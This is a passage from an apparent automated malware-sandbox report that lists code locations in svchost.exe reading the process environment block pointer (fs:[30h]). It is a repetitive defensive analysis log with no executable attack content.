Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]	2_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]	2_2_02F402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]	2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]	2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]	2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]	2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]	2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]	2_2_02F2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]	2_2_02F2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]	2_2_02F36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]	2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]	2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]	2_2_02F2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]	2_2_02F663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]	2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]	2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]	2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]	2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]	2_2_02FEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]	2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]	2_2_02FB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]	2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]	2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]	2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]	2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]	2_2_02FD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]	2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]	2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]	2_2_02FD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]	2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]	2_2_02F2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]	2_2_02F50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]	2_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]	2_2_02F2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]	2_2_02F720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_02F2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]	2_2_02F380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]	2_2_02FB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]	2_2_02FB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]	2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]	2_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]	2_2_02FC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]	2_2_02F3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]	2_2_02F5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]	2_2_02F32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]	2_2_02FB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]	2_2_02FC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]	2_2_02F2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]	2_2_02F2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]	2_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]	2_2_030061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]	2_2_02FB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]	2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]	2_2_02F601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	2_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	2_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]	2_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]	2_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]	2_2_02F70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]	2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]	2_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]	2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]	2_2_02FD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]	2_2_02F2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]	2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]	2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]	2_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]	2_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]	2_2_02F60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]	2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]	2_2_02FF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]	2_2_02FDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	2_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]	2_2_02F666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_02F6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]	2_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]	2_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]	2_2_02F62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]	2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]	2_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]	2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]	2_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]	2_2_02F4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]	2_2_02F4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]	2_2_02F66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]	2_2_02F68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]	2_2_02F3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]	2_2_02F72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]	2_2_02FAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]	2_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]	2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]	2_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]	2_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]	2_2_02FBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]	2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]	2_2_02FB07C3
